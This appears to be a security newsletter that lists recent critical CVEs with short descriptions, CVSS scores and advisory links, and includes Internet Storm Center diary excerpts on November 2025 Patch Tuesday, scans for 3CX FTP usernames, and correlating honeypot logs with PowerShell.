NVD References: https://www.mozilla.org/security/advisories/mfsa2025-87/

CVE-2025-13032 – Avast/AVG Antivirus <25.3 on Windows is vulnerable to a double fetch in the sandbox kernel driver, allowing local attackers to escalate privileges via pool overflow.
Product: Avast AVG Antivirus
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13032

CVE-2025-60724 – Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.
Product: Microsoft Office
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60724
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724

CVE-2025-12870 & CVE-2025-12871 – aEnrich’s a+HRD software is vulnerable to Authentication Abuse, enabling unauthorized remote attackers to create admin access tokens for elevated system access.
Product: aEnrich a+Hrd
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12870
NVD References: https://www.twcert.org.tw/en/cp-139-10487-12a32-2.html

CVE-2025-63666 – Tenda AC15 v15.03.05.18_multi exposes account password hash and uses insecure session identifier, allowing attackers to steal cookies and access protected resources.
Product: Tenda AC15
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63666
NVD References: https://github.com/Remenis/CVE-2025-63666

CVE-2025-11366 – N-central < 2025.4 is vulnerable to authentication bypass via path traversal
Product: N-Able N-Central
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11366
NVD References: https://me.n-able.com/s/security-advisory/aArVy0000000rcDKAQ/cve202511366-ncentral-authentication-bypass-via-path-traversal

CVE-2025-11367 – The N-central Software Probe < 2025.4 is vulnerable to Remote Code Execution via deserialization
Product: N-Able N-Central
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11367
NVD References: https://me.n-able.com/s/security-advisory/aArVy0000000rfRKAQ/cve202511367-ncentral-windows-software-probe-remote-code-execution

CVE-2025-63289 – Sogexia Android App’s encryption_helper.dart file in SDK v35 and below had hardcoded encryption keys.
Product: Sogexia Android App Compile
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63289

CVE-2025-63353 – FiberHome GPON ONU HG6145F1 RP4423 is vulnerable to network access as attackers can predict the factory default Wi-Fi password from the SSID.
Product: FiberHome GPON ONU HG6145F1 RP4423
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63353

CVE-2025-64280 & CVE-2025-64281 – Multiple vulnerabilities in CentralSquare Community Development 19.5.7
Product: CentralSquare Community Development
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64280
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64281
NVD References: https://machevalia.blog/blog/multiple-vulnerabilities-in-centralsquare-etrakit-and-ivr

CVE-2025-56385 – WellSky Harmony version 4.1.0.2.83 contains a SQL injection vulnerability in the login functionality that could result in authentication bypass, data leakage, or full system compromise.
Product: WellSky Harmony
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-56385
NVD References: https://machevalia.blog/blog/cve-2025-56385-wellsky-harmony-sql-injection

CVE-2025-63679 – Free5GC v4.1.0 and before is vulnerable to Buffer Overflow during the processing of an UplinkRANConfigurationTransfer NGAP message from a gNB, causing the AMF process to crash.
Product: Free5GC v4.1.0
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63679

CVE-2025-46608 – Dell Data Lakehouse versions prior to 1.6.0.0 have an Improper Access Control vulnerability that could allow a high privileged attacker to gain elevated privileges, compromising system integrity and customer data.
Product: Dell Data Lakehouse
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-46608
NVD References: https://www.dell.com/support/kbdoc/en-us/000390529/dsa-2025-375-security-update-for-dell-data-lakehouse-multiple-vulnerabilities

CVE-2025-12762 – pgAdmin is vulnerable to Remote Code Execution (RCE) when restoring PLAIN-format dump files in server mode, enabling attackers to execute arbitrary commands on the hosting server, compromising the database’s security.
Product: pgAdmin
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12762

CVE-2025-64709 – Typebot’s HTTP Request component functionality prior to version 3.13.1 contains a Server-Side Request Forgery (SSRF) vulnerability that allows authenticated users to access AWS Instance Metadata Service (IMDS) and extract temporary AWS IAM credentials for the EKS node role, leading to complete compromise of the Kubernetes cluster and associated AWS infrastructure.
Product: Typebot chatbot builder
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64709

CVE-2025-36096 – IBM AIX 7.2, 7.3, and IBM VIOS 3.1, 4.1 have insecure storage of NIM private keys, making them vulnerable to unauthorized access through man in the middle attacks.
Product: IBM AIX 7.2, and 7.3, VIOS 3.1, and 4.1
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-36096
NVD References: https://www.ibm.com/support/pages/node/7251173

CVE-2025-36250 – IBM AIX 7.2, 7.3, and IBM VIOS 3.1, 4.1 NIM server are vulnerable to remote code execution through the nimesis service due to improper process controls.
Product: IBM AIX 7.2
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-36250
NVD References: https://www.ibm.com/support/pages/node/7251173

CVE-2025-36251 – IBM AIX 7.2, 7.3, and IBM VIOS 3.1, 4.1 nimsh service SSL/TLS implementations could allow remote attackers to execute arbitrary commands by lacking proper process controls.
Product: IBM AIX 7.2, and 7.3 and IBM VIOS 3.1, and 4.1
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-36251
NVD References: https://www.ibm.com/support/pages/node/7251173

CVE-2025-54339 & CVE-2025-54343 – Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 allows remote attackers to escalate privileges due to Incorrect Access Control vulnerabilities in the Application Server.
Product: Desktop Alert PingAlert
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-54339
NVD References:
– https://desktopalert.net/cve-2025-54339/
– https://desktopalert.net/CVE-2025-54343/

CVE-2025-13188 – D-Link DIR-816L 2_06_b09_beta is susceptible to a stack-based buffer overflow via manipulation of the Password argument in authenticationcgi_main of /authentication.cgi, allowing for remote exploitation despite no longer being supported by the maintainer.
Product: D-Link DIR-816L
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13188

CVE-2025-58083 – General Industrial Controls Lynx+ Gateway is vulnerable to remote device reset due to missing critical authentication in the embedded web server.
Product: General Industrial Controls Lynx+ Gateway
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58083
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-317-08

CVE-2025-13284 – ThinPLUS by ThinPLUS is at risk of unauthorized remote attackers exploiting an OS Command Injection vulnerability to execute arbitrary commands on the server.
Product: ThinPLUS
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13284
NVD References: https://www.twcert.org.tw/en/cp-139-10513-0d82b-2.html

CVE-2025-63747 – QaTraq 6.9.2 has default administrative account credentials that allow immediate login via the web application, granting attackers administrative access.
Product: QaTraq 6.9.2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63747

CVE-2024-44659 – PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the email parameter in forgot-password.php.
Product: PHPGurukul Online Shopping Portal
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44659

CVE-2025-40547, CVE-2025-40548 & CVE-2025-40549 – SolarWinds Serv-U has multiple vulnerabilities that allows a malicious actor with admin privileges to execute code.
Product: SolarWinds Serv-U
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40547
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40548
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40549
NVD References:
– https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm
– https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40547
– https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40548
– https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40549

CVE-2025-41733 – Affected devices do not validate if already initialized, allowing unauthenticated remote attacker to set root credentials via POST requests on the commissioning wizard.
Product: METZ CONNECT EWIO2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41733
NVD References:
– https://certvde.com/de/advisories/VDE-2025-097
– https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-05

CVE-2025-41734 – An unauthenticated remote attacker can execute arbitrary php files and gain full access of the affected devices.
Product: METZ CONNECT EWIO2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41734
NVD References:
– https://certvde.com/de/advisories/VDE-2025-097
– https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-05

CVE-2025-9312 – WSO2 products are vulnerable to a missing authentication enforcement issue in their mutual TLS implementation, allowing for unauthenticated requests and potential unauthorized access by malicious actors.
Product: WSO2 System REST APIs and SOAP services
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-9312
NVD References: https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4494/

CVE-2025-11170 – The cpi-wp-migration CPI plugin for WordPress allows unauthenticated attackers to upload arbitrary files on the server, potentially leading to remote code execution.
Product: cpi-wp-migration CPI plugin for WordPress
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11170
NVD References:
– https://wordpress.org/plugins/cpi-wp-migration/
– https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve

CVE-2025-12813 – The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution up to version 7.1 through the ‘contents’ parameter, allowing unauthenticated attackers to execute code on the server.
Product: WordPress Holiday class post calendar plugin
Active Installations: This plugin has been closed as of November 7, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12813
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/7f7968c4-589c-4949-9f69-4a0ba4db4ea9?source=cve

CVE-2025-12539 – The TNC Toolbox: Web Performance plugin for WordPress is vulnerable to Sensitive Information Exposure due to storing cPanel API credentials in unprotected files, allowing attackers to compromise the hosting environment.
Product: TNC Toolbox Web Performance plugin for WordPress
Active Installations: 1,000+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12539
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/2eaa5a5c-c11f-40d0-be69-c3ec8029a819?source=cve

CVE-2025-9501 – W3 Total Cache WordPress plugin before 2.8.13 allows unauthenticated users to execute PHP commands by injecting a malicious payload in a comment.
Product: W3-EDGE W3 Total Cache WordPress plugin
Active Installations: 1 million+
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-9501

CONTENTS:
=========================================================
INTERNET STORM CENTER SPOTLIGHT
OTHER INTERNET STORM CENTER ENTRIES
RECENT CVEs
=========================================================

INTERNET STORM CENTER SPOTLIGHT
ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

Microsoft Patch Tuesday for November 2025
Published: 2025-11-11
Last Updated: 2025-11-11 19:24:30 UTC
by Johannes Ullrich (Version: 1)

Today’s Microsoft Patch Tuesday offers fixes for 80 different vulnerabilities. One of the vulnerabilities is already being exploited, and five are rated as critical.

Notable Vulnerabilities:

CVE-2025-62215: This vulnerability is already being exploited. It is a privilege escalation vulnerability in the Windows Kernel. These types of vulnerabilities are often exploited as part of a more complex attack chain; however, exploiting this specific vulnerability is likely to be relatively straightforward, given the existence of prior similar vulnerabilities.

CVE-2025-60724: A critical GDI+ remote execution vulnerability. GDI+ parses various graphics files. The attack surface is likely huge, as anything in Windows (Browsers, email, and Office Documents) will use this library at some point to display images. We also have a critical vulnerability in Direct-X CVE-2025-60716. Microsoft classifies this as a privilege escalation issue, yet still rates it as critical.

CVE-2025-62199: A code execution vulnerability in Microsoft Office. Another component with a huge attack surface that is often exploited.

Given the number and type of vulnerabilities, I would consider this patch Tuesday “lighter than normal”. There are no “Patch Now” vulnerabilities, and I suggest applying these vulnerabilities in accordance with your vulnerability management program …

Read the full entry: https://isc.sans.edu/diary/Microsoft+Patch+Tuesday+for+November+2025/32468/

It isn’t always defaults: Scans for 3CX usernames
Published: 2025-11-10
Last Updated: 2025-11-10 15:23:31 UTC
by Johannes Ullrich (Version: 1)

Today, I noticed scans using the username “FTP_3cx” showing up in our logs. 3CX is a well-known maker of business phone system software. My first guess was that this was a default user for one of their systems. But Google came up empty for this particular string. The 3CX software does not appear to run an FTP server, but it offers a feature to back up configurations to an FTP server. The example user used in the documentation is “3cxftpuser”, not “FTP_3cx”. Additionally, the documentation notes that the FTP server can run on a different system from the 3CX software. For a backup, it would not make much sense to have it all run on the same system.

The scans we are seeing likely target FTP servers users set up to back up 3CX configurations, and not the 3CX software itself. I am not familiar enough with 3CX to know precisely what the backup contains, but it most likely includes sufficient information to breach the 3CX installation.

The credentials we observe with our Cowrie-based honeypots are collected for telnet and ftp. In particular, on Linux systems, you often use a system user to connect via FTP. Any credentials working via FTP will also work for telnet or SSH. Keep that in mind when configuring a user for FTP access, and of course, FTP should not be your first choice for backing up sensitive data, but we all know it does happen ,,,

Read the full entry: https://isc.sans.edu/diary/It+isnt+always+defaults+Scans+for+3CX+usernames/32464/

Binary Breadcrumbs: Correlating Malware Samples with Honeypot Logs Using PowerShell
[Guest Diary]
Published: 2025-11-05
Last Updated: 2025-11-06 02:27:25 UTC
by David Hammond (Version: 1)

[This is a Guest Diary by David Hammond, an ISC intern as part of the SANS.edu BACS program]

My last college credit on my way to earning a bachelor’s degree was an internship opportunity at the Internet Storm Center. A great opportunity, but one that required the care and feeding of a honeypot. The day it arrived I plugged the freshly imaged honeypot into my home router and happily went about my day. I didn’t think too much about it until the first attack observation was due. You see, I travel often, but my honeypot does not. Furthermore, the administrative side of the honeypot was only accessible through the internal network. I wasn’t about to implement a whole remote solution just to get access while on the road. Instead, I followed some very good advice. I started downloading regular backups of the honeypot logs on a Windows laptop I frequently had with me.

The internship program encouraged us to at least initially review our honeypot logs with command line utilities, such as jq and all its flexibility with filtering. Combined with other standard Unix-like operating system tools, such as wc (word count), less, head, and cut, it was possible to extract exactly what I was looking for. I initially tried using more graphical tools but found I enjoy “living” in the command line better. When I first start looking at logs, I was not always sure of what I’m looking for. Command line tools allow me to quickly look for outliers in the data. I can see what sticks out by negating everything that looks the same.

So, what’s the trouble? None of these tools were available on my Windows laptop. Admittedly, most of what I mention above are available for Windows, but my ability to install software was restricted on this machine, and I knew that native alternatives existed. At the time I had several directories of JSON logs, and a long list of malware hash values corresponding to an attack I was interested in understanding better. Here’s how a few lines of PowerShell can transform scattered honeypot logs into a clear picture of what really happened …

Read the full entry: https://isc.sans.edu/diary/Binary+Breadcrumbs+Correlating+Malware+Samples+with+Honeypot+Logs+Using+PowerShell+Guest+Diary/32454/

OTHER INTERNET STORM CENTER ENTRIES

Honeypot: Requests for (Code) Repositories (2025.11.08)
https://isc.sans.edu/diary/Honeypot+Requests+for+Code+Repositories/32460/

Apple Patches Everything, Again (2025.11.04)
https://isc.sans.edu/diary/Apple+Patches+Everything+Again/32448/

RECENT CVEs
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2025-59396 – WatchGuard Firebox devices have a vulnerability that allows administrative access through SSH on port 4118 using the readwrite password for the admin account until 2025-09-10.
Product: WatchGuard Firebox devices
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59396
ISC Podcast: https://isc.sans.edu/podcastdetail/9694

CVE-2025-12480 – Triofox is vulnerable to an Improper Access Control flaw, allowing access to initial setup pages post-completion in versions before 16.7.10368.56560.
Product: Triofox
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12480
ISC Podcast: https://isc.sans.edu/podcastdetail/9696
NVD References:
– https://access.triofox.com/releases_history/
– https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480
– https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2025/MNDT-2025-0008.md

CVE-2025-60724 – Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.
Product: Microsoft Graphics Component
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60724
ISC Diary: https://isc.sans.edu/diary/32468
ISC Podcast: https://isc.sans.edu/podcastdetail/9696
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724

CVE-2025-54863 – Radiometrics VizAir is vulnerable to remote exposure of its REST API key, enabling attackers to manipulate weather data, disrupt airport operations, and engage in denial-of-service attacks.
Product: Radiometrics VizAir
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-54863
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04

CVE-2025-61945 – Radiometrics VizAir is vulnerable to remote attackers through unauthorized access to the admin panel, allowing manipulation of critical weather parameters and potentially endangering aircraft safety.
Product: Radiometrics VizAir
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61945
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04

CVE-2025-61956 – Radiometrics VizAir lacks authentication mechanisms, enabling attackers to manipulate settings, mislead air traffic control, pilots, and forecasters.
Product: Radiometrics VizAir
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61956
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04

CVE-2025-47776 – Mantis Bug Tracker (MantisBT) is vulnerable to a type juggling issue in authentication code, allowing attackers to login without knowing the victim’s password in versions 2.27.1 and below.
Product: MantisBT
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47776

CVE-2025-52910 – Samsung Mobile Processor and Wearable Processor Exynos 1280, 2200, 1330, 1380, 1480, 2400 are vulnerable to a Use-After-Free leading to privilege escalation.
Product: Samsung Exynos 1280
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-52910

CVE-2025-12735 – The expr-eval library is vulnerable to arbitrary code execution due to insufficient input validation in the evaluate() function.
Product: expr-eval library JavaScript expression parser
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12735

CVE-2025-55108 – Control-M/Agent is vulnerable to unauthenticated remote code execution and unauthorized file access if mutual SSL/TLS authentication is not enabled.
Product: BMC Control-M/Agent
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55108

CVE-2025-47151 – Entr’ouvert Lasso 2.5.1 and 2.8.2 are vulnerable to type confusion, allowing attackers to execute arbitrary code through specially crafted SAML responses.
Product: Entrouvert Lasso
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47151

CVE-2025-64459 – Django is vulnerable to SQL injection in versions 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8 due to a flaw in QuerySet methods and the class Q().
Product: Djangoproject
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64459

CVE-2025-61304 – OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address.
Product: Dynatrace ActiveGate ping extension
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61304

CVE-2025-63601 – Snipe-IT is vulnerable to authenticated remote attackers uploading and executing system commands via a malicious backup file prior to version 8.3.3.
Product: Snipe-IT app
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63601

CVE-2025-20354 – Cisco Unified CCX is vulnerable to arbitrary file upload and command execution due to inadequate authentication mechanisms, enabling an attacker to gain root access on affected systems.
Product: Cisco Unified Contact Center Express
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-20354
NVD References: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ

CVE-2025-20358 – Cisco Unified CCX Contact Center Express Editor application is vulnerable to authentication bypass, granting unauthenticated attackers administrative permissions for script creation and execution.
Product: Cisco Unified Contact Center Express
CVSS Score: 9.4
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-20358
NVD References: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ

CVE-2025-45378 – Dell CloudLink versions 8.0 through 8.1.2 are vulnerable to unauthorized access and privilege escalation through a restricted shell exploit.
Product: Dell CloudLink
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-45378
NVD References: https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities

CVE-2025-46364 – Dell CloudLink versions prior to 8.1.1 are vulnerable to a privilege escalation attack via CLI Escape Vulnerability.
Product: Dell CloudLink
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-46364
NVD References: https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities

CVE-2025-56231 – Tonec Internet Download Manager 6.42.41.1 and earlier suffers from Missing SSL Certificate Validation, which allows attackers to bypass update protections.
Product: Tonec Internet Download Manager
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-56231

CVE-2025-55343 – Quipux 4.0.1 through e1774ac allows authenticated users to conduct SQL injection attacks in multiple parameters.
Product: Quipux 4.0.1 through e1774ac
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55343

CVE-2025-63416 – SelfBest platform 2023.3 has a Stored Cross-Site Scripting vulnerability in its chat functionality that allows attackers to execute arbitrary JavaScript in other users’ sessions, leading to privilege escalation and sensitive data compromise.
Product: SelfBest
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63416

CVE-2025-63334 – PocketVJ CP version 3.9.1 is susceptible to unauthenticated remote code execution via the opacityValue POST parameter in submit_opacity.php.
Product: PocketVJ-CP-v3 pvj
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63334

CVE-2025-62161 – Youki is vulnerable to a container escape attack in versions 0.5.6 and below due to insufficient validation of the source /dev/null, fixed in version 0.5.7.
Product: Youki-Dev
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62161

CVE-2025-62596 – Youki is vulnerable to a write-target validation flaw in versions 0.5.6 and below, allowing for writes to unintended procfs locations through shared-mount race exploitation.
Product: Youki-Dev
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62596

CVE-2025-64163 – DataEase has an SSRF vulnerability in versions 2.10.14 and below due to omission of protection for the dns:// protocol, but it is fixed in version 2.10.15.
Product: DataEase
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64163

CVE-2025-64164 – DataEase version 2.10.14 and below is vulnerable to JNDI injection when establishing JDBC connections to Oracle.
Product: DataEase
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64164

CVE-2025-27918 – AnyDesk before 9.0.0 is vulnerable to a heap-based buffer overflow due to an integer overflow in UDP packet processing.
Product: Anydesk
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27918

CVE-2025-64180 – Manager-io/Manager accounting software is vulnerable to unauthorized access to internal network resources due to a flaw in its DNS validation mechanism, allowing attackers to bypass network isolation and access internal services and protected network segments.
Product: Manager-io Manager
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64180
NVD References: https://github.com/Manager-io/Manager/security/advisories/GHSA-j2xj-xhph-p74j

CVE-2025-63689 – Ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) is vulnerable to multiple SQL injection attacks, enabling remote attackers to execute arbitrary code through the orderby parameter.
Product: ycf1998 money-pos system
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63689

CVE-2025-63690 – Pig-mesh Pig versions 3.8.2 and below suffer from a remote code execution vulnerability due to insecure handling of scheduled tasks in the Quartz management function.
Product: pig-mesh Pig
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63690

CVE-2025-63691 – In pig-mesh In Pig version 3.8.2 and below, there is an improper permission verification vulnerability in the Token Management function, allowing ordinary users to gain administrator access and takeover the system.
Product: pig-mesh Pig
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63691

CVE-2025-10230 – Samba is vulnerable to remote code execution due to unsanitized NetBIOS name data being passed to a shell command without proper validation.
Product: Samba Active Directory Domain Controller
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-10230

CVE-2025-12866 – EIP Plus developed by Hundred Plus is vulnerable to a Weak Password Recovery Mechanism, allowing remote attackers to predict or brute-force the ‘forgot password’ link and reset any user’s password.
Product: Hundred Plus EIP Plus
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12866
NVD References: https://www.twcert.org.tw/en/cp-139-10491-004b0-2.html

CVE-2025-12868 – New Site Server developed by CyberTutor is vulnerable to unauthenticated remote attackers exploiting a Use of Client-Side Authentication flaw to gain administrator privileges on the website.
Product: CyberTutor New Site Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12868
NVD References: https://www.twcert.org.tw/en/cp-139-10492-84a10-2.html

CVE-2025-64689 – In JetBrains YouTrack before 2025.3.104432 misconfiguration in the Junie could lead to exposure of the global Junie token
Product: JetBrains YouTrack
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64689
NVD References: https://www.jetbrains.com/privacy-security/issues-fixed/

CVE-2025-64522 – Soft Serve 0.11.1 and earlier versions are vulnerable to SSRF attacks due to inadequate validation of webhook URLs, enabling repository admins to target internal services and cloud metadata endpoints.
Product: Soft Serve Git server
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64522

CVE-2025-42887 – SAP Solution Manager is vulnerable to code injection by authenticated attackers through remote-enabled function modules, potentially granting full system control and severely impacting confidentiality, integrity, and availability.
Product: SAP Solution Manager
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42887

CVE-2025-42890 – SQL Anywhere Monitor (Non-GUI) has baked credentials into the code, allowing unintended users to access resources and potentially execute arbitrary code, posing a high risk to system security.
Product: SAP SQL Anywhere Monitor
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-42890

CVE-2025-8324 – Zohocorp ManageEngine Analytics Plus versions 6170 and below are vulnerable to Unauthenticated SQL Injection due to the improper filter configuration.
Product: Zohocorp ManageEngine Analytics Plus
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8324

CVE-2025-13032 – Avast/AVG Antivirus <25.3 on Windows is vulnerable to a double fetch in the sandbox kernel driver, allowing local attackers to escalate privileges via pool overflow.
Product: Avast AVG Antivirus
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13032

CVE-2025-60716 – Use after free in Windows DirectX allows an authorized attacker to elevate privileges locally.
Product: Microsoft Windows DirectX
CVSS Score: 7.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60716
ISC Diary: https://isc.sans.edu/diary/32468
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60716

CVE-2025-62199 – Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.
Product: Microsoft Office
CVSS Score: 7.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62199
ISC Diary: https://isc.sans.edu/diary/32468
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62199

CVE-2025-62215 – Windows Kernel is vulnerable to race conditions that can be exploited by an authorized attacker to locally elevate privileges.
Product: Microsoft Windows Kernel
CVSS Score: 7.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62215
ISC Diary: https://isc.sans.edu/diary/32468
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62215

CVE-2025-11007 & CVE-2025-11008 – The CE21 Suite plugin for WordPress allows unauthenticated attackers to update API settings and create new admin accounts (CVE-2025-11007) and is vulnerable to Sensitive Information Exposure through the log file, allowing unauthenticated attackers to extract sensitive data and potentially take over a site (CVE-2025-11008).
Product: WordPress CE21 Suite plugin
Active Installations: This plugin has been closed as of October 30, 2025 and is not available for download. This closure is temporary, pending a full review.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11007
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-11008
NVD References:
– https://www.wordfence.com/threat-intel/vulnerabilities/id/5e24feac-1812-45d7-b3c3-27787eed1cf1?source=cve
– https://www.wordfence.com/threat-intel/vulnerabilities/id/91aa86d9-8e42-4deb-b6ca-c3b388fefcb1?source=cve

